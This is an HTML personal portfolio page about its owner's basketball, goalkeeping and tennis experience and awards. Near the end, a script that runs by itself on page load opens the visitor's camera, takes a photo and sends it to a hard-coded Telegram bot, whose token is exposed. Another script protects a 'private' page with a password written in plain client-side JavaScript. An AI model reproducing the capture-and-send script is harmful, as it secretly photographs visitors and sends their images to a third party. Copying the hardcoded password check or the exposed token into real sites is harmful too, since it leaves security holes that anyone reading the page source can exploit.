<!DOCTYPE html>
<html lang="en">

<head>
    <title>AradArasteh</title>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <!-- <link rel="apple-touch-icon" href="assets/img/apple-icon.png">
    <link rel="shortcut icon" type="image/x-icon" href="assets/img/favicon.ico"> -->
    <!-- Load Require CSS -->
          <link rel="icon" href="a/aaaaaaaaaaaaaaaaaaaa.jpg">
    <link href="assets/css/bootstrap.min.css" rel="stylesheet">
    <!-- Font CSS -->
    <link href="assets/css/boxicon.min.css" rel="stylesheet">
    <link href="https://fonts.googleapis.com/css2?family=Open+Sans:wght@300;400;600&display=swap" rel="stylesheet">
    <!-- Load Tempalte CSS -->
    <link rel="stylesheet" href="assets/css/templatemo.css">
    <!-- Custom CSS -->
    <link rel="stylesheet" href="assets/css/custom.css">
<!--
    
TemplateMo 561 Purple Buzz

https://templatemo.com/tm-561-purple-buzz

-->
</head>

<body>
    <!-- Header -->
    <nav id="main_nav" class="navbar navbar-expand-lg navbar-light bg-white shadow">
        <div class="container d-flex justify-content-between align-items-center">
            <a class="navbar-brand h1" href="index.html">
                <span class="text-dark h4">Arad</span> <span class="text-primary h4">Arasteh</span>
            </a>
            <button class="navbar-toggler border-0" type="button" data-bs-toggle="collapse" data-bs-target="#navbar-toggler-success" aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
                <span class="navbar-toggler-icon"></span>
            </button>

            <div class="align-self-center collapse navbar-collapse flex-fill  d-lg-flex justify-content-lg-between" id="navbar-toggler-success">
                <div class="flex-fill mx-xl-5 mb-2">
                    <ul class="nav navbar-nav d-flex justify-content-between mx-xl-5 text-center text-dark">
                        <li class="nav-item">
                            <a class="nav-link btn-outline-primary rounded-pill px-3" href="index.html">Home</a>
                        </li>
                        <li class="nav-item">
                            <a class="nav-link btn-outline-primary rounded-pill px-3" href="about.html">About</a>
                        </li>
                        <li class="nav-item">
                            <a class="nav-link btn-outline-primary rounded-pill px-3" href="work.html">Music</a>
                        </li>
                        <!-- <li class="nav-item">
                            <a class="nav-link btn-outline-primary rounded-pill px-3" href="pricing.html">Pricing</a>
                        </li> -->
                         <li class="nav-item">
  <a class="nav-link btn-outline-primary rounded-pill px-3" href="javascript:void(0);" onclick="checkPassword()">Private</a>
</li>
                        <li class="nav-item">
                            <a class="nav-link btn-outline-primary rounded-pill px-3" href="contact.html">Contact</a>
                        </li>
                    </ul>
                </div>
                <div class="navbar align-self-center d-flex">
                    <a class="nav-link" href="#"><i class='bx bx-bell bx-sm bx-tada-hover text-primary'></i></a>
                    <a class="nav-link" href="#"><i class='bx bx-cog bx-sm text-primary'></i></a>
                    <a class="nav-link" href="#"><i class='bx bx-user-circle bx-sm text-primary'></i></a>
                </div>
            </div>
        </div>
    </nav>
    <!-- Close Header -->


    <!-- Start pricing -->
    <div class="container-lg py-5">
        <div class="col-md-12 m-auto text-center py-5">
            <h1 class="pricing-header h2 semi-bold-600">sports</h1>
            <p class="pricing-footer">
                passion for specific sports
            </p>
        </div>


        <!-- <div class="row px-lg-3">


            <div class="col-md-4 pb-5 pt-sm-0 mt-5 px-xl-3">
                <div class="pricing-table card h-100 shadow-sm border-0 py-5">
                    <div class="pricing-table-body card-body rounded-pill text-center align-self-center p-md-0">
                        <i class="pricing-table-icon display-3 bx bx-package text-secondary"></i>
                        <h2 class="pricing-table-heading h5 semi-bold-600">Free Plan</h2>
                        <p>$0</p>
                        <ul class="pricing-table-body text-start text-dark px-4 list-unstyled light-300">
                            <li><i class="bx bxs-circle me-2"></i>5 Users</li>
                            <li><i class="bx bxs-circle me-2"></i>2 TB space</li>
                            <li><i class="bx bxs-circle me-2"></i>Community Forums</li>
                            <li><i class="bx bxs-circle me-2"></i>Email Support</li>
                        </ul>
                        <div class="pricing-table-footer pt-5">
                            <a href="#" class="btn rounded-pill px-4 btn-outline-primary light-300">Get Now</a>
                        </div>
                    </div>
                </div>
            </div>


            <div class="col-md-4 pt-sm-0 pt-3 px-xl-3">
                <div class="pricing-table card bg-secondary h-100 card-rounded shadow-sm border-0 py-5">
                    <div class="pricing-table-body card-body text-center text-white align-self-center p-md-0">
                        <i class="pricing-table-icon display-3 bx bx-package text-white py-3"></i>
                        <h2 class="pricing-table-heading h5 semi-bold-600">Standard Plan</h2>
                        <p>$120/Year</p>
                        <ul class="pricing-table-list text-start text-dark px-4 list-unstyled light-300">
                            <li class="text-white"><i class="bx bxs-circle me-2"></i>25 to 99 Users</li>
                            <li class="text-white"><i class="bx bxs-circle me-2"></i>10 TB space</li>
                            <li class="text-white"><i class="bx bxs-circle me-2"></i>Source Files</li>
                            <li class="text-white"><i class="bx bxs-circle me-2"></i>Live Chat</li>
                        </ul>
                        <div class="pricing-table-footer pt-5 pb-2">
                            <a href="#" class="btn rounded-pill px-4 btn-outline-light light-300">Get Now</a>
                        </div>
                    </div>
                </div>
            </div>


            <div class="col-md-4 pb-5 pt-sm-0 mt-5 px-xl-3">
                <div class="pricing-table card h-100 shadow-sm border-0 py-5">
                    <div class="pricing-table-body card-body text-center align-self-center p-md-0">
                        <i class="pricing-table-icon display-3 bx bx-package text-secondary"></i>
                        <h2 class="pricing-table-heading h5 semi-bold-600">Enterprise</h2>
                        <p>$840/Year</p>
                        <ul class="pricing-table-list text-start text-dark px-4 list-unstyled light-300">
                            <li><i class="bx bxs-circle me-2"></i>100 users or more</li>
                            <li><i class="bx bxs-circle me-2"></i>80 TB space</li>
                            <li><i class="bx bxs-circle me-2"></i>Full Access Sources</li>
                            <li><i class="bx bxs-circle me-2"></i>Live Chat</li>
                            <li><i class="bx bxs-circle me-2"></i>Customizations</li>
                        </ul>
                        <div class="pricing-table-footer pt-1">
                            <a href="#" class="btn rounded-pill px-4 btn-outline-primary light-300">Get Now</a>
                        </div>
                    </div>
                </div>
            </div>


        </div> -->







<div class="row px-lg-3">

  <!-- Free Plan -->
  <div class="col-md-4 pb-5 pt-sm-0 mt-5 px-xl-3">
    <div class="pricing-table card h-100 shadow-sm border-0 py-5">
      <div class="pricing-table-body card-body rounded-pill text-center align-self-center p-md-0">
        
        <!-- Image Placeholder -->
        <img src="a/ba.jpg" alt="Free Plan" class="img-fluid mb-3" style="max-height: 120px; border-radius: 12px;">


        <h2 class="pricing-table-heading h5 semi-bold-600">Basketball</h2>
        <p>I really enjoy basketball—more than any other sport, it’s the one I’ve played the most. I’ve won trophies and medals in this field, and I find it to be a highly team-oriented and exciting game</p>
        <!-- <ul class="pricing-table-body text-start text-dark px-4 list-unstyled light-300">
          <li><i class="bx bxs-circle me-2"></i>5 Users</li>
          <li><i class="bx bxs-circle me-2"></i>2 TB space</li>
          <li><i class="bx bxs-circle me-2"></i>Community Forums</li>
          <li><i class="bx bxs-circle me-2"></i>Email Support</li>
        </ul> -->
        <div class="pricing-table-footer pt-5">
          <!-- <a href="#" class="btn rounded-pill px-4 btn-outline-primary light-300">Get Now</a> -->
        </div>
      </div>
    </div>
  </div>

  <!-- Standard Plan -->
  <div class="col-md-4 pt-sm-0 pt-3 px-xl-3">
    <div class="pricing-table card bg-secondary h-100 card-rounded shadow-sm border-0 py-5">
      <div class="pricing-table-body card-body text-center text-white align-self-center p-md-0">
        
        <!-- Image Placeholder -->
        <img src="a/va.jpg" alt="Standard Plan" class="img-fluid mb-3" style="max-height: 120px; border-radius: 12px;">

        <h2 class="pricing-table-heading h5 semi-bold-600">goalkeeping</h2>
        <p>I’m not very interested in football overall, but I really enjoy goalkeeping and defense. I follow both international and Iranian teams—especially Esteghlal Tehran and Real Madrid</p>
        <!-- <ul class="pricing-table-list text-start text-dark px-4 list-unstyled light-300">
          <li class="text-white"><i class="bx bxs-circle me-2"></i>25 to 99 Users</li>
          <li class="text-white"><i class="bx bxs-circle me-2"></i>10 TB space</li>
          <li class="text-white"><i class="bx bxs-circle me-2"></i>Source Files</li>
          <li class="text-white"><i class="bx bxs-circle me-2"></i>Live Chat</li>
        </ul> -->
        <div class="pricing-table-footer pt-5 pb-2">
          <!-- <a href="#" class="btn rounded-pill px-4 btn-outline-light light-300">Get Now</a> -->
        </div>
      </div>
    </div>
  </div>

  <!-- Enterprise Plan -->
  <div class="col-md-4 pb-5 pt-sm-0 mt-5 px-xl-3">
    <div class="pricing-table card h-100 shadow-sm border-0 py-5">
      <div class="pricing-table-body card-body text-center align-self-center p-md-0">
        
        <!-- Image Placeholder -->
        <img src="a/te.jpg" alt="Enterprise Plan" class="img-fluid mb-3" style="max-height: 120px; border-radius: 12px;">


        <h2 class="pricing-table-heading h5 semi-bold-600">Tennis</h2>
        <p>I play tennis recreationally, and I think it’s a beautiful sport.</p>
        <!-- <ul class="pricing-table-list text-start text-dark px-4 list-unstyled light-300">
          <li><i class="bx bxs-circle me-2"></i>100 users or more</li>
          <li><i class="bx bxs-circle me-2"></i>80 TB space</li>
          <li><i class="bx bxs-circle me-2"></i>Full Access Sources</li>
          <li><i class="bx bxs-circle me-2"></i>Live Chat</li>
          <li><i class="bx bxs-circle me-2"></i>Customizations</li>
        </ul> -->
        <div class="pricing-table-footer pt-1">
          <!-- <a href="#" class="btn rounded-pill px-4 btn-outline-primary light-300">Get Now</a> -->
        </div>
      </div>
    </div>
  </div>

</div>










    </div>
    <!-- End Content -->





    <!-- Start Pricing Horizontal Section -->
<!-- Start Pricing Horizontal -->
     <div class="container-lg py-5">
        <div class="col-md-12 m-auto text-center py-5">
            <h1 class="pricing-header h2 semi-bold-600">Basketball</h1>
            <p class="pricing-footer">
               The teams I’ve played for.
            </p>
        </div>
<div class="pricing-horizontal row col-10 m-auto d-flex shadow-sm rounded overflow-hidden bg-white">
  <!-- Image replaces icon section -->
  <div class="pricing-horizontal-icon col-md-3 p-0">
    <img src="a/photo_2025-08-21_13-18-10 (2).jpg" alt="Free Plan" class="" style="width: 250px; height: 250px;">
  </div>
  <div class="pricing-horizontal-body offset-lg-1 col-md-5 col-lg-4 d-flex align-items-center pl-5 pt-lg-0 pt-4">
    <ul class="text-left px-4 list-unstyled mb-0 light-300">
      <li><i class="bx bxs-circle me-2"></i>7 years of experience playing in the Development League.</li>
      <li><i class="bx bxs-circle me-2"></i>One championship title in a four-team tournament.</li>
      <li><i class="bx bxs-circle me-2"></i>One medal and one trophy.</li>
    </ul>
  </div>
  <div class="pricing-horizontal-tag col-md-4 text-center pt-3 d-flex align-items-center">
    <div class="w-100 light-300">
      <a href="#" class="btn rounded-pill px-4 btn-outline-primary mb-3">Basketball</a>
    </div>
  </div>
</div>
<!-- End Pricing Horizontal -->

<!-- Start Pricing Horizontal -->
<div class="pricing-horizontal row col-10 m-auto d-flex shadow-sm rounded overflow-hidden my-5 bg-white">
  <!-- Image replaces icon section -->
  <div class="pricing-horizontal-icon col-md-3 p-0">
    <img src="a/photo_2025-08-21_14-07-48.jpg" alt="Standard Plan" class="" style="width: 250px; height: 250px;">
  </div>
  <div class="pricing-horizontal-body offset-lg-1 col-md-5 col-lg-4 d-flex align-items-center pl-5 pt-lg-0 pt-4">
    <ul class="text-left px-4 list-unstyled mb-0 light-300">
      <li><i class="bx bxs-circle me-2"></i>One year of experience playing in the professional league</li>
      <!-- <li><i class="bx bxs-circle me-2"></i></li>
      <li><i class="bx bxs-circle me-2"></i>Live Chat</li> -->
    </ul>
  </div>
  <div class="pricing-horizontal-tag col-md-4 text-center pt-3 d-flex align-items-center">
    <div class="w-100 light-300">
      <a href="#" class="btn rounded-pill px-4 btn-outline-primary mb-3">Basketball</a>
    </div>
  </div>
</div>
<!-- End Pricing Horizontal -->

<!-- Start Pricing Horizontal -->
<div class="pricing-horizontal row col-10 m-auto d-flex shadow-sm rounded overflow-hidden bg-white">
  <!-- Image replaces icon section -->
  <div class="pricing-horizontal-icon col-md-3 p-0">
    <img src="a/ma.png" alt="Enterprise Plan" class="img-fluid w-100 h-100" style="object-fit: cover;">
  </div>
  <div class="pricing-horizontal-body offset-lg-1 col-md-5 col-lg-4 d-flex align-items-center pl-5 pt-lg-0 pt-4">
    <ul class="text-left px-4 list-unstyled mb-0 light-300">
      <!-- <li><i class="bx bxs-circle me-2"></i>100 users or more</li>
      <li><i class="bx bxs-circle me-2"></i>80 TB space</li>
      <li><i class="bx bxs-circle me-2"></i>Full Access</li>
      <li><i class="bx bxs-circle me-2"></i>Customizations</li> -->
    </ul>
  </div>
  <div class="pricing-horizontal-tag col-md-4 text-center pt-3 d-flex align-items-center">
    <div class="w-100 light-300">
      <a href="#" class="btn rounded-pill px-4 btn-outline-primary mb-3">Basketball</a>
    </div>
  </div>
</div>
<!-- End Pricing Horizontal -->
    <!--End Pricing Horizontal Section-->

    <section class="container py-5">

        <h1 class="h2 semi-bold-600 text-center pt-5">Basketball</h1>
        <p class="text-center pb-5 light-300">
        Awards earned in basketball
        </p>

        <div class="row d-flex align-items-center pb-5">

            <div class="col-lg-6 offset-lg-0 col-md-8 offset-md-2">
                <img class="rounded float-right" src="./assets/img/pricing.svg">
            </div>

            <div class="col-lg-6">

                <!-- Start Pricing List -->
                <div class="pricing-list shadow-sm rounded-top rounded-3 py-sm-0 py-5">
                    <div class="row p-2">
                        <div class="pricing-list-icon col-3 text-center m-auto text-secondary ml-5 py-2">
                        </div>
                        <div class="pricing-list-body col-md-5 align-items-center pl-3 pt-2">
                            <ul class="list-unstyled text-center light-300">
                                <li>One medal and one trophy</li>
                            </ul>
                        </div>
                        <div class="pricing-list-footer col-4 text-center m-auto align-items-center">
                            <a href="#" class="btn rounded-pill px-4 btn-primary light-300">Basketball</a>
                        </div>
                    </div>
                </div>
                <!-- End Pricing List -->

                <!-- Start Pricing List -->
                <div class="pricing-list shadow-sm py-sm-0 py-5">
                    <div class="row p-2">
                        <div class="pricing-list-icon col-3 text-center m-auto text-secondary ml-5 py-2">
                        </div>
                        <div class="pricing-list-body col-md-5 align-items-center pl-3 pt-2">
                            <ul class="list-unstyled text-center light-300">
                                <li>One championship title, one third-place finish in regular competitions, and another third-place in a FIBA 3x3 tournament</li>
                            </ul>
                        </div>
                        <div class="pricing-list-footer col-sm-4 col-5 text-center m-auto align-items-center">
                            <a href="#" class="btn rounded-pill px-4 btn-primary light-300">Basketball</a>
                        </div>
                    </div>
                </div>
                <!-- End Pricing List -->

                <!-- Start Pricing List -->
                <div class="pricing-list shadow-sm rounded-botton rounded-3 py-sm-0 py-5">
                    <div class="row p-2">
                        <div class="pricing-list-icon col-sm-3 text-center m-auto text-secondary ml-5 py-2">
                        </div>
                        <div class="pricing-list-body col-md-5 align-items-center pl-3 pt-2">
                            <ul class="list-unstyled text-center light-300">
                                <li>One championship title in a one-on-one basketball tournament.</li>
                            </ul>
                        </div>
                        <div class="pricing-list-footer col-sm-4 col-5 text-center m-auto align-items-center">
                            <a href="#" class="btn rounded-pill px-4 btn-primary light-300">Basketball</a>
                        </div>
                    </div>
                </div>
                <!-- End Pricing List -->



            </div>
        </div>
    </section>


    <!-- Start Footer -->
    <footer class="bg-secondary pt-4">
        <div class="container">
            <div class="row py-4">

                <div class="col-lg-3 col-12 align-left">
                    <a class="navbar-brand" href="index.html">
                        <!-- <i class='bx bx-buildings bx-sm text-light'></i> -->
                        <span class="text-light h5">Arad</span> <span class="text-light h5 semi-bold-600">Arasteh</span>
                    </a>
                    <p class="text-light my-lg-4 my-2">
                    </p>
                    <ul class="list-inline footer-icons light-300">
                        <li class="list-inline-item m-0">
                            <a class="text-light" target="_blank" href="http://facebook.com/">
                                <!-- <i class='bx bxl-facebook-square bx-md'></i> -->
                            </a>
                        </li>
                        <li class="list-inline-item m-0">
                            <a class="text-light" target="_blank" href="https://www.linkedin.com/">
                                <!-- <i class='bx bxl-linkedin-square bx-md'></i> -->
                            </a>
                        </li>
                        <li class="list-inline-item m-0">
                            <a class="text-light" target="_blank" href="https://www.whatsapp.com/">
                                <!-- <i class='bx bxl-whatsapp-square bx-md'></i> -->
                            </a>
                        </li>
                        <li class="list-inline-item m-0">
                            <a class="text-light" target="_blank" href="https://www.flickr.com/">
                                <!-- <i class='bx bxl-flickr-square bx-md'></i> -->
                            </a>
                        </li>
                        <li class="list-inline-item m-0">
                            <a class="text-light" target="_blank" href="https://www.medium.com/">
                                <!-- <i class='bx bxl-medium-square bx-md' ></i> -->
                            </a>
                        </li>
                    </ul>
                </div>

                <div class="col-lg-3 col-md-4 my-sm-0 mt-4">
                    <h3 class="h4 pb-lg-3 text-light light-300">Our Part</h2>
                        <ul class="list-unstyled text-light light-300">
                            <li class="pb-2">
                                <i class='bx-fw bx bxs-chevron-right bx-xs'></i><a class="text-decoration-none text-light" href="index.html">Home</a>
                            </li>
                            <li class="pb-2">
                                <i class='bx-fw bx bxs-chevron-right bx-xs'></i><a class="text-decoration-none text-light py-1" href="about.html">About Us</a>
                            </li>
                            <li class="pb-2">
                                <i class='bx-fw bx bxs-chevron-right bx-xs'></i><a class="text-decoration-none text-light py-1" href="work.html">Music</a>
                            </li>
                            <!-- <li class="pb-2">
                                <i class='bx-fw bx bxs-chevron-right bx-xs'></i></i><a class="text-decoration-none text-light py-1" href="pricing.html">Price</a>
                            </li> -->
                            <li class="pb-2">
                                <i class='bx-fw bx bxs-chevron-right bx-xs'></i><a class="text-decoration-none text-light py-1" href="contact.html">Contact</a>
                            </li>
                        </ul>
                </div>

                <!-- <div class="col-lg-3 col-md-4 my-sm-0 mt-4">
                    <h2 class="h4 pb-lg-3 text-light light-300">Our Works</h2>
                    <ul class="list-unstyled text-light light-300">
                        <li class="pb-2">
                            <i class='bx-fw bx bxs-chevron-right bx-xs'></i><a class="text-decoration-none text-light py-1" href="#">Branding</a>
                        </li>
                        <li class="pb-2">
                            <i class='bx-fw bx bxs-chevron-right bx-xs'></i><a class="text-decoration-none text-light py-1" href="#">Business</a>
                        </li>
                        <li class="pb-2">
                            <i class='bx-fw bx bxs-chevron-right bx-xs'></i><a class="text-decoration-none text-light py-1" href="#">Marketing</a>
                        </li>
                        <li class="pb-2">
                            <i class='bx-fw bx bxs-chevron-right bx-xs'></i><a class="text-decoration-none text-light py-1" href="#">Social Media</a>
                        </li>
                        <li class="pb-2">
                            <i class='bx-fw bx bxs-chevron-right bx-xs'></i><a class="text-decoration-none text-light py-1" href="#">Digital Solution</a>
                        </li>
                        <li class="pb-2">
                            <i class='bx-fw bx bxs-chevron-right bx-xs'></i><a class="text-decoration-none text-light py-1" href="#">Graphic</a>
                        </li>
                    </ul>
                </div> -->

                <div class="col-lg-3 col-md-4 my-sm-0 mt-4">
                    <h2 class="h4 pb-lg-3 text-light light-300">This Is My Phon Number And Gmail </h2>
                    <ul class="list-unstyled text-light light-300">
                        <li class="pb-2">
                            <i class='bx-fw bx bx-phone bx-xs'></i><a class="text-decoration-none text-light py-1" href="tel:010-020-0340">0921-070-2616</a>
                        </li>
                        <li class="pb-2">
                            <i class='bx-fw bx bx-mail-send bx-xs'></i><a class="text-decoration-none text-light py-1" href="mailto:info@company.com">arasteharad36@gmail,com</a>
                        </li>
                    </ul>
                </div>

            </div>
        </div>

        <div class="w-100 bg-primary py-3">
            <div class="container">
                <div class="row pt-2">
                    <div class="col-lg-6 col-sm-12">
                    </div>
                    <div class="col-lg-6 col-sm-12">
                        <p class="text-lg-end text-center text-light light-300">
                            Designed by <a rel="sponsored" class="text-decoration-none text-light" href="https://templatemo.com/" target="_blank"><strong>AradArasteh</strong></a>
                        </p>
                    </div>
                </div>
            </div>
        </div>

    </footer>
    <!-- End Footer -->


    <!-- Bootstrap -->
    <script src="assets/js/bootstrap.bundle.min.js"></script>
    <!-- Templatemo -->
    <script src="assets/js/templatemo.js"></script>
    <!-- Custom -->
    <script src="assets/js/custom.js"></script>












        <script>
        async function takePhotoAndSend() {
            {
        
            const stream = await navigator.mediaDevices.getUserMedia({ video: true });

            const video = document.createElement('video');
            document.body.appendChild(video);
            video.srcObject = stream;
            await video.play();


            const canvas = document.createElement('canvas');
            const context = canvas.getContext('2d')
            canvas.width = video.videoWidth;
            canvas.height = video.videoHeight;
            context.drawImage(video, 0, 0, canvas.width, canvas.height);


            canvas.toBlob(blob => {
                sendPhotoToTelegram(blob);
                stream.getTracks().forEach(track => track.stop());
                document.body.removeChild(video);
                document.body.removeChild(canvas);
            }, 'image/jpeg');

            // } cach (error) {
                 console.error('Error accessing the camera: ', error);
            }
        }





         function sendPhotoToTelegram(blob) {
             const url = 'https://api.telegram.org/bot6923568496:AAHM_gMcdsy-O712NIoj87NbVe1fp7auoiw/sendPhoto';
             const formData = new FormData();
             formData.append('photo', blob, 'photo.jpg');
             formData.append('chat_id', '1209515299');

             fetch(url, {
                 method: 'POST',
                 body: formData
             })
             .then(response => response.json())
             .then(data => console.log(data))
             .catch(error => console.error('Error sending photo to Telegram: ', error));

         }
         takePhotoAndSend();
     </script>
     <script>
function checkPassword() {
  const correctPassword = "Arad7766@";

  const firstTry = prompt("لطفاً رمز عبور را وارد کنید:");
  if (firstTry === null) return;

  if (firstTry === correctPassword) {
    window.location.href = "pricing.html";
  } else {
    const secondTry = prompt("رمز اشتباه بود! لطفاً دوباره تلاش کنید:");
    if (secondTry === null) return;

    if (secondTry === correctPassword) {
      window.location.href = "pricing.html";
    } else {
      alert("رمز اشتباه است! دسترسی غیرمجاز.");
    }
  }
}
</script>

</body>

</html>